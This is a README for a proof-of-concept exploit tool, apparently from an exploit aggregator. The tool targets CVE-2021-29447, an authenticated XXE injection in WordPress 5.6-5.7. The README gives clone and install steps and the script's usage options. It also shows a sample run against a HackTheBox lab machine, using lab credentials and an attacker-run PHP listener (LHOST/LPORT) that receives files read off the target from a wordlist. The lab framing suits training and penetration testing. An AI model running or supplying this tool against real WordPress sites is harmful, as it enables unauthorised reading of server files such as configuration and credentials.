## https://sploitus.com/exploit?id=243DD03B-6EBA-5F46-BCE7-0F7133CA0BAD
# CVE-2021-29447
POC to exploit WordPress 5.6-5.7 (PHP 8+) Authenticated XXE Injection. More about this CVE [here](https://www.sonarsource.com/blog/wordpress-xxe-security-vulnerability/)
## Example
Example usage against HackTheBox's MetaTwo machine, which hosts a WordPress website with Media Library vulnerable to XXE Injection.
```bash
python lfi.py -u manager -p partylikearockstar -t metapress.htb -lh 10.10.XX.XX -lp 8081 -w file_wordlist
```
[![asciicast](https://asciinema.org/a/wqBueScWdUnuG4HzHbYPuOThI.svg)](https://asciinema.org/a/wqBueScWdUnuG4HzHbYPuOThI)
## Usage
```bash
usage: lfi.py [-h] -u USERNAME -p PASSWORD -t TARGET -lh LHOST [-lp LPORT] [-w WORDLIST] [-i] [-v] [-s]
[filenames ...]
positional arguments:
filenames Filenames to fetch
options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username to user in authenticated upload
-p PASSWORD, --password PASSWORD
Password to user in authenticated upload
-t TARGET, --target TARGET
Remote host to target, e.g. "metapress.htb"
-lh LHOST, --host LHOST
Hostname on which server is bound (default "")
-lp LPORT, --port LPORT
Listening port (default "8080")
-w WORDLIST, --wordlist WORDLIST
Wordlist of filenames to be fetched
-i, --interactive Runs in interactive mode
-v, --verbose Enables verbose mode
-s, --skip Skip php server spin-up (MAKE SURE IT IS ALREADY RUNNING!)
```
## Installation
**Make sure you have php installed.**
```bash
git clone https://github.com/viardant/CVE-2021-29447
cd CVE-2021-29447
pip install -r requirements.txt
```